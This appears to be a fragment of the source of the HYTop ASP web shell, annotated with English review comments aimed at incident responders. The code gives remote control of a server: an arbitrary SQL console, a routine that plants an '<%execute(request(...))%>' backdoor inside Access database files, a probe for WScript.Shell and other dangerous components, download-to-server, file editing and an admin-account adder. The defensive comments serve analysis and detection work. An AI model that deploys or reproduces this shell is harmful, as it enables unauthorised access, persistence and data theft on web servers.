📄 123.asp
sqlStr = Session(m & "sqlStr")
End If
End If
Session(m & "sqlStr") = sqlStr
echo "<style>body{margin:8;}</style>"
echo "<form method=post action='?pageName=MsDataBase&theAct=showTables' onSubmit='this.Submit.disabled=true;'>"
echo "<a href='?pageName=MsDataBase'>mdb+mssql数据库操作</a><br/>"
echo "<input name=sqlStr type=text id=sqlStr value=""" & sqlStr & """ size=60 style='width:80%;'>"
echo "<input name=theAct type=hidden value=showTables><br/>"
echo "<input type=Submit name=Submit value=' 提交 '>"
echo "<input type=button name=Submit2 value=' 插入 ' onclick=""if(confirm('这里是在ACESS数据里插入海阳顶端网ASP后门\n默认密码是" & clientPassword & "\n后门插入后可以使用的前提是\n数据库是asp后缀, 并且没有错乱asp代码\n确认操作吗?')){location.href='?pageName=MsDataBase&theAct=inject&sqlStr='+this.form.sqlStr.value;this.disabled=true;}"">"
echo "<input type=button value=' 示例 ' onclick=""this.form.sqlStr.value='e:\\HYTop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;';"">"
echo "</form>"
echo "<hr/>注: 插入只针对ACCESS操作, 要浏览ACCESS在表单中的写法是""d:\bbs.mdb"", SQL据库写法是""sql:连接字符串"", 不要忘写sql:。<hr/>"
Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()
Case "inject"
accessInject()
End Select
echo "Powered By Marcos 2005.02"
End Sub
' showTables: opens the database named by the request parameter "sqlStr" and prints every
' table and its column metadata as HTML.
'
' Review context: this Sub is the schema browser of the "MsDataBase" panel of an ASP web shell.
' No check inside this Sub restricts who calls it or which database is opened; the request
' alone selects the target. The links this panel prints carry pageName=MsDataBase,
' theAct=showTables and sqlStr in the query string, so those parameter names are the trace
' to search for in web server logs.
Sub showTables()
' Runtime errors are suppressed unless the debug flag is set, so a failed connection does not
' surface as an ASP error page. isDebugMode is defined outside this view.
If isDebugMode = False Then
On Error Resume Next
End If
Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
' Caller-controlled value, used below without validation.
sqlStr = Request("sqlStr")
' A "sql:" prefix means the remainder is handed to ADO verbatim as a full OLE DB connection
' string (provider, server and credentials included); anything else is treated as a file
' path and opened through the Jet (Access) provider.
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
' chkErr is defined outside this view; presumably it reports Err and stops - confirm.
chkErr(Err)
' getTableList returns the HTML link list and also sets rsTable to the table schema recordset.
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
echo "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>转到SQL命令执行</a><hr/>"
Do Until rsTable.Eof
' Schema id 4 is adSchemaColumns; the third restriction limits it to the current table.
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
' Table and column metadata are written into the page without HtmlEncode.
echo "<table border=0 cellpadding=0 cellspacing=0><tr><td height=22 colspan=6><b>" & rsTable("Table_Name") & "</b></td>"
echo "</tr><tr><td colspan=6><hr/></td></tr><tr align=center>"
echo "<td>字段名</td><td>类型</td><td>大小</td><td>精度</td><td>允许为空</td><td>默认值</td></tr>"
echo "<tr><td colspan=6><hr/></td></tr>"
Do Until rsColumn.Eof
echo "<tr align=center>"
echo "<td align=Left> " & rsColumn("Column_Name") & "</td>"
echo "<td width=80>" & getDataType(rsColumn("Data_Type")) & "</td>"
echo "<td width=70>" & rsColumn("Character_Maximum_Length") & "</td>"
echo "<td width=70>" & rsColumn("Numeric_Precision") & "</td>"
echo "<td width=70>" & rsColumn("Is_Nullable") & "</td>"
echo "<td width=80>" & rsColumn("Column_Default") & "</td>"
echo "</tr>"
rsColumn.MoveNext
Loop
echo "<tr><td colspan=6><hr/></td></tr></table>"
rsTable.MoveNext
Loop
echo "<hr/>"
' Only the connection is closed explicitly; the recordset references are just released.
conn.Close
Set conn = Nothing
Set rsTable = Nothing
Set rsColumn = Nothing
End Sub
' showQuery: runs a caller-supplied SQL statement against the database named by "sqlStr" and
' renders the result (for SELECT) or a completion message (for anything else).
'
' Review context: this is the statement console of the web shell's "MsDataBase" panel. Both the
' connection target and the statement text come from the request and are passed to ADO as-is,
' so whoever reaches this page has the full rights of the connection. Paging and table links
' put sqlStr and sql into the query string (theAct=query), which makes the statements
' recoverable from web server logs when those links are followed.
Sub showQuery()
' Errors are hidden unless the debug flag (defined outside this view) is set.
If isDebugMode = False Then
On Error Resume Next
End If
Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable
' All four inputs are read from the request without validation.
sql = Request("sql")
page = Request("page")
sqlStr = Request("sqlStr")
theTable = Request("theTable")
' A missing or non-numeric page falls back to the first page.
If Not IsNumeric(page) or page = "" Then
page = 1
End If
' Clicking a table link (theTable set, no sql) previews its first ten rows. The table name is
' concatenated into the statement; the brackets are quoting, not escaping.
If sql = "" And theTable <> "" Then
sql = "Select top 10 * from [" & theTable & "]"
End If
' Same target selection as showTables: "sql:" + raw OLE DB connection string, otherwise a
' file path opened through the Jet (Access) provider.
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
' chkErr is defined outside this view; presumably it reports Err and stops - confirm.
chkErr(Err)
' getTableList also sets rsTable; it is only released at the end of this Sub.
tablesStr = getTableList(conn, sqlStr, rsTable)
echo "<a href=""?pageName=MsDataBase&theAct=showTables&sqlStr=" & UrlEncode(sqlStr) & """>数据库表结构查看:</a><br/>"
echo tablesStr & "<hr/>"
' Note: this href is emitted without surrounding quotes, unlike the other links.
echo "<a href=?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & ">SQL命令执行及查看</a>"
echo "<br/><form method=post action=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & """>"
echo "<input name=sql type=text id=sql value=""" & HtmlEncode(sql) & """ size=60>"
echo "<input type=Submit name=Submit4 value=执行查询><hr/>"
' Statements that start with "select " are opened as a recordset and paged; every other
' non-empty statement goes to conn.Execute in the Else branch below.
If sql <> "" And Left(LCase(sql), 7) = "select " Then
' Cursor type 1 (adOpenKeyset), lock type 1 (adLockReadOnly).
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize = 20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If rs.Fields.Count>0 Then
echo "<br><table border=""1"" cellpadding=""0"" cellspacing=""0"" width=""98%"">"
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""tr"" colspan=""" & rs.Fields.Count & """>SQL操作 - 执行结果</td>"
echo "</tr>"
echo "<tr>"
' Header row: field names are written without HtmlEncode.
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"" class=""td""> " & rs.Fields(j).Name & " </td>"
Next
' At most 20 rows (one page) are printed, stopping early at end of data.
For i = 1 To 20
If rs.Eof Then
Exit For
End If
echo "</tr>"
echo "<tr valign=top>"
' Cell values pass through fixNull (defined outside this view) and are HTML-encoded.
For j = 0 To rs.Fields.Count-1
echo "<td height=""22"" align=""center"">" & HtmlEncode(fixNull(rs(j))) & "</td>"
Next
echo "</tr>"
rs.MoveNext
Next
End If
echo "<tr>"
echo "<td height=""22"" align=""center"" class=""td"" colspan=""" & rs.Fields.Count & """>"
' Pager: one link per page. Replace swaps the "{$font<page>}" placeholder of the current page
' for class=warningColor; the placeholders of the other pages stay in the markup as written.
For i = 1 To rs.PageCount
echo Replace("<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&sql=" & UrlEncode(sql) & "&page=" & i & """><font {$font" & i & "}>" & i & "</font></a> ", "{$font" & page & "}", "class=warningColor")
Next
echo "</td></tr></table>"
rs.Close
Else
' Non-SELECT path: the statement is executed unchanged, with no allow-list of verbs, so data
' and schema changes are possible with whatever rights the connection has.
If sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo "<center><br>执行完毕!</center>"
End If
End If
echo "</form><hr/>"
conn.Close
Set rs = Nothing
Set conn = Nothing
Set rsTable = Nothing
End Sub
' getDataType: turns an ADO data-type code (the Data_Type column of the column schema) into
' the Chinese label shown in the schema table. Codes without a label are returned unchanged.
Function getDataType(typeId)
Select Case typeId
' 130 = adWChar, labelled "text"
Case 130
getDataType = "文本"
' 2 = adSmallInt, labelled "integer"
Case 2
getDataType = "整型"
' 3 = adInteger, labelled "long integer"
Case 3
getDataType = "长整型"
' 7 = adDate, labelled "date/time"
Case 7
getDataType = "日期/时间"
' 5 = adDouble, labelled "double"
Case 5
getDataType = "双精度型"
' 11 = adBoolean, labelled "yes/no"
Case 11
getDataType = "是/否"
' 128 = adBinary, labelled "OLE object"
Case 128
getDataType = "OLE 对象"
' Any other code is shown as its raw numeric value.
Case Else
getDataType = typeId
End Select
End Function
' accessInject: writes a one-line ASP code-evaluation stub into an Access (.mdb) database file
' chosen by the request parameter "sqlStr".
'
' Review context: this is the persistence feature of the web shell. It creates a table named
' "notdownloads" with a single OLE-object column of the same name and stores the stub bytes in
' one row. The page's own confirmation text states the stub is only usable when the database
' file has an .asp extension, i.e. when the web server hands the file to the ASP engine.
' For responders: an Access file containing a "notdownloads" table, or the byte sequence
' "<%execute(request(" inside an .mdb/.asp database file, is the artefact this Sub leaves.
' Keeping database files outside the web root, or under an extension that is not mapped to a
' script handler, removes the precondition.
Sub accessInject()
' Errors are hidden unless the debug flag (defined outside this view) is set.
If isDebugMode = False Then
On Error Resume Next
End If
Dim rs, conn, sqlStr, connStr
sqlStr = Request("sqlStr")
' "sql:" targets are rejected with a message ("insert only works on ACCESS databases").
' showErr is defined outside this view; whether it ends the response is not visible here.
' If it does not, connStr stays empty for the Open call below.
If LCase(Left(sqlStr, 4)) = "sql:" Then
showErr("插入只对ACCESS数据库有效!")
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set rs = Server.CreateObject("Adodb.RecordSet")
Set conn = Server.CreateObject("Adodb.Connection")
conn.Open connStr
chkErr(Err)
' notdownloadsExists is not declared or assigned in this Sub; unless it is set elsewhere the
' drop is skipped and a pre-existing table makes the create below fail (silently when errors
' are suppressed).
If notdownloadsExists = True Then
conn.Execute("drop table notdownloads")
End If
conn.Execute("create table notdownloads(notdownloads oleobject)")
' Cursor type 1 (adOpenKeyset), lock type 3 (adLockOptimistic): an updatable recordset.
rs.Open "notdownloads", conn, 1, 3
rs.AddNew
' The payload is assembled one byte at a time with ChrB so it is stored as single-byte text
' rather than a Unicode string. The bytes spell an ASP block that evaluates one request
' parameter. Asc() returns the code of the first character only, so just the first character
' of clientPassword (defined outside this view) is written as that parameter's name.
rs("notdownloads").AppendChunk(ChrB(Asc("<")) & ChrB(Asc("%")) & ChrB(Asc("e")) & ChrB(Asc("x")) & ChrB(Asc("e")) & ChrB(Asc("c")) & ChrB(Asc("u")) & ChrB(Asc("t")) & ChrB(Asc("e")) & ChrB(Asc("(")) & ChrB(Asc("r")) & ChrB(Asc("e")) & ChrB(Asc("q")) & ChrB(Asc("u")) & ChrB(Asc("e")) & ChrB(Asc("s")) & ChrB(Asc("t")) & ChrB(Asc("(")) & ChrB(Asc("""")) & ChrB(Asc(clientPassword)) & ChrB(Asc("""")) & ChrB(Asc(")")) & ChrB(Asc(")")) & ChrB(Asc("%")) & ChrB(Asc(">")) & ChrB(Asc(" ")))
rs.Update
rs.Close
' The success alert is printed unconditionally; with errors suppressed it does not prove that
' the write happened.
echo "<script language=""javascript"">alert('插入成功!');history.back();</script>"
conn.Close
Set rs = Nothing
Set conn = Nothing
End Sub
' getTableList: builds the HTML list of table links for the database panel.
'   conn    - an open ADO connection
'   sqlStr  - the caller's database selector, repeated URL-encoded in every link
'   rsTable - set by this function to the table schema recordset (callers read it afterwards)
' Returns the concatenated anchor tags as a string; each link opens the query page with
' theTable set to that table.
Function getTableList(conn, sqlStr, rsTable)
' Schema id 20 is adSchemaTables; the fourth restriction keeps only entries of type "table".
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
Do Until rsTable.Eof
' The table name is URL-encoded inside the href but written unencoded as the link text.
getTableList = getTableList & "<a href=""?pageName=MsDataBase&theAct=query&sqlStr=" & UrlEncode(sqlStr) & "&theTable=" & UrlEncode(rsTable("Table_Name")) & """>[" & rsTable("Table_Name") & "]</a> "
rsTable.MoveNext
Loop
' Rewind so the caller can iterate the same recordset from the first table.
rsTable.MoveFirst
End Function
' PageObjOnSrv: renders the "server component support" page. It probes a fixed list of COM
' ProgIDs, plus one ProgID or ClassId typed into the form, and reports which can be created.
'
' Review context: this is the reconnaissance page of the web shell. The list ends with the
' components that give script code file-system, process and network access
' (Scripting.FileSystemObject, Adodb.Stream, Shell.Application, WScript.Shell, Wscript.Network),
' so the output shows which of them the ASP worker identity may instantiate. Restricting or
' unregistering components a site does not need narrows what a script on that host can use.
Sub PageObjOnSrv()
Dim i, objTmp, txtObjInfo, strObjectList, strDscList
' Free-form component name from the request; it is echoed back into the form below.
txtObjInfo = Trim(Request("txtObjInfo"))
' Two parallel comma-separated lists matched by position: ProgIDs and their Chinese
' descriptions. An empty description means the entry is printed without one.
strObjectList = "MSWC.AdRotator,MSWC.BrowserType,MSWC.NextLink,MSWC.Tools,MSWC.Status,MSWC.Counters,IISSample.ContentRotator," & _
"IISSample.PageCounter,MSWC.PermissionChecker,Adodb.Connection,SoftArtisans.FileUp,SoftArtisans.FileManager,LyfUpload.UploadFile," & _
"Persits.Upload.1,W3.Upload,JMail.SmtpMail,CDONTS.NewMail,Persits.MailSender,SMTPsvg.Mailer,DkQmail.Qmail,Geocel.Mailer," & _
"IISmail.Iismail.1,SmtpMail.SmtpMail.1,SoftArtisans.ImageGen,W3Image.Image," & _
"Scripting.FileSystemObject,Adodb.Stream,Shell.Application,WScript.Shell,Wscript.Network"
strDscList = "广告轮换,浏览器信息,内容链接库,,,计数器,内容轮显,,权限检测,ADO 数据对象,SA-FileUp 文件上传,SoftArtisans 文件管理," & _
"刘云峰的文件上传组件,ASPUpload 文件上传,Dimac 文件上传,Dimac JMail 邮件收发,虚拟 SMTP 发信,ASPemail 发信,ASPmail 发信,dkQmail 发信," & _
"Geocel 发信,IISmail 发信,SmtpMail 发信,SA 的图像读写,Dimac 的图像读写组件," & _
"FSO,Stream 流,,,"
' aryObjectList and aryDscList are not in the Dim list above; they are either declared
' outside this view or created implicitly here.
aryObjectList = Split(strObjectList, ",")
aryDscList = Split(strDscList, ",")
' showTitle is defined outside this view.
showTitle("服务器组件支持情况检测")
echo "其他组件支持情况检测<br/>"
echo "在下面的输入框中输入你要检测的组件的ProgId或ClassId。<br/>"
echo "<form method=post>"
' txtObjInfo is written into the value attribute without HtmlEncode.
echo "<input name=txtObjInfo size=30 value=""" & txtObjInfo & """><input name=theAct type=submit value=我要检测>"
echo "</form>"
' The submit button's own caption is used as the action value for the ad-hoc probe.
If Request("theAct") = "我要检测" And txtObjInfo <> "" Then
Call getObjInfo(txtObjInfo, "")
End If
echo "<hr/>"
echo "<lu>组件名称 ┆ 支持及其它"
' The loop is bounded by the description list and indexes both arrays with the same i.
For i = 0 To UBound(aryDscList)
Call getObjInfo(aryObjectList(i), aryDscList(i))
Next
echo "</lu><hr/>Powered By Marcos 2005.02"
End Sub
' getObjInfo: prints one list item saying whether the COM component named by strObjInfo can be
' created on this server.
'   strObjInfo - ProgID or ClassId to probe; may come straight from the request (see the
'                ad-hoc probe in PageObjOnSrv)
'   strDscInfo - optional description shown in parentheses; "" to omit
' The name is passed unchanged to Server.CreateObject, so the component is really instantiated,
' and it is echoed into the page without HtmlEncode.
Sub getObjInfo(strObjInfo, strDscInfo)
Dim objTmp
' Errors are suppressed unless the debug flag (defined outside this view) is set; the result
' is read from Err after the create call instead.
If isDebugMode = False Then
On Error Resume Next
End If
echo "<li> " & strObjInfo
If strDscInfo <> "" Then
echo " (" & strDscInfo & "组件)"
End If
echo " ┆ "
Set objTmp = Server.CreateObject(strObjInfo)
' -2147221005 is 0x800401F3 (invalid class string), i.e. the name is not registered. Any other
' outcome, including a different creation error, is reported as supported.
If Err <> -2147221005 Then
echo "√ "
' Version and About are read from the created object; components that lack these members
' raise an error that is swallowed when suppression is on.
echo "Version: " & objTmp.Version & "; "
echo "About: " & objTmp.About
Else
echo "×"
End If
echo "</li>"
' Reset the error state so the next probe starts clean.
If Err Then
Err.Clear
End If
Set objTmp = Nothing
End Sub
Sub PageOtherTools()
Dim theAct
theAct = Request("theAct")
showTitle("一些零碎的小东西")
Select Case theAct
Case "downFromUrl"
downFromUrl()
Response.End
Case "addUser"
AddUser Request("userName"), Request("passWord")
Response.End
Case "readReg"
readReg()
Response.End
End Select
echo "数制转换:<hr/>"
echo "<input name=text1 value=字符和数字转10和16进制 size=25 id=text9>"
echo "<input type=button onclick=main(); value=给我转>"
echo "<input value=16进制转10进制和字符 size=25 id=vars>"
echo "<input type=button onClick=main2(); value=给我转>"
echo "<hr/>"
echo "下载到服务器:<hr/>"
echo "<form method=post target=_blank>"
echo "<input name=theUrl value='http://' size=80><input type=submit value=' 下载 '><br/>"
echo "<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80>"
echo "<input type=checkbox name=overWrite value=2>存在覆盖"
echo "<input type=hidden value=downFromUrl name=theAct>"
echo "</form>"
echo "<hr/>"
echo "文件编辑:<hr/>"
echo "<form method=post action='?' target=_blank>"
echo "<input size=80 name=thePath value=""" & HtmlEncode(Request.ServerVariables("PATH_TRANSLATED")) & """>"
echo "<input type=hidden value=showEdit name=theAct>"
echo "<select name=pageName><option value=AppFileExplorer>用Stream</option><option value=FsoFileExplorer>用FSO</option></select>"
echo "<input type=submit value=' 打开 '>"
echo "</form><hr/>"
echo "管理帐号添加(成功率极低):<hr/>"
echo "<form method=post target=_blank>"
echo "<input type=hidden value=addUser name=theAct>"
echo "<input name=userName value='HYTop' size=39>"
echo "<input name=passWord type=password value='HYTop' size=39>"
echo "<input type=submit value=' 添加 '>"
echo "</form><hr/>"